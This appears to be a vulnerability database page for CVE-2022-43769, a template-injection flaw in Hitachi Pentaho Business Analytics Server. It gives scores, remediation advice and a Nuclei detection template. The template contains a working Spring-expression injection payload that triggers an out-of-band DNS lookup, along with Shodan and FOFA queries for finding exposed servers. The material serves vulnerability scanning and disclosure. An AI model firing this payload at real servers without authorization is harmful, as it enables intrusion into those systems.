ProjectDiscoveryNUCLEI:CVE-2022-43769Hitachi Pentaho Business Analytics Server - Remote Code Execution
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.4 High
AI Score
Confidence
High
0.562 Medium
EPSS
Percentile
97.7%
Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
id: CVE-2022-43769
info:
name: Hitachi Pentaho Business Analytics Server - Remote Code Execution
author: dwbzn
severity: high
description: |
Hitachi Pentaho Business Analytics Server prior to versions 9.4.0.1 and 9.3.0.2, including 8.3.x, is susceptible to remote code execution via server-side template injection. Certain web services can set property values which contain Spring templates that are interpreted downstream, thereby potentially enabling an attacker to execute malware, obtain sensitive information, modify data, and/or perform unauthorized operations without entering necessary credentials.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected server.
remediation: Upgrade to 9.4 with Service Pack 9.4.0.1. For version 9.3, recommend updating to Service Pack 9.3.0.2.
reference:
- https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-
- https://nvd.nist.gov/vuln/detail/CVE-2022-43769
- http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-43769
cwe-id: CWE-94,CWE-74
epss-score: 0.68571
epss-percentile: 0.97978
cpe: cpe:2.3:a:hitachi:vantara_pentaho_business_analytics_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: hitachi
product: vantara_pentaho_business_analytics_server
shodan-query: http.favicon.hash:1749354953
fofa-query: icon_hash=1749354953
tags: cve,cve2022,packetstorm,rce,ssti,pentaho,hitachi
http:
- method: GET
path:
- "{{BaseURL}}/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName('{{interactsh-url}}')}&mgrDn=a&pwd=a"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- "false"
- type: word
part: header
words:
- "application/json"
# digest: 4b0a00483046022100b6fe5cb4fe0961d377873ec798ae30e388a187213c0b8346113ef78710c260b7022100e9b8d091872aa733437d61c7871e8a27d049d6008c3c6e7222fbbc60c446f68d:922c64590222798bb761d5b6d8e72950References
packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html
nvd.nist.gov/vuln/detail/CVE-2022-43769
support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-
Related
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.4 High
AI Score
Confidence
High
0.562 Medium
EPSS
Percentile
97.7%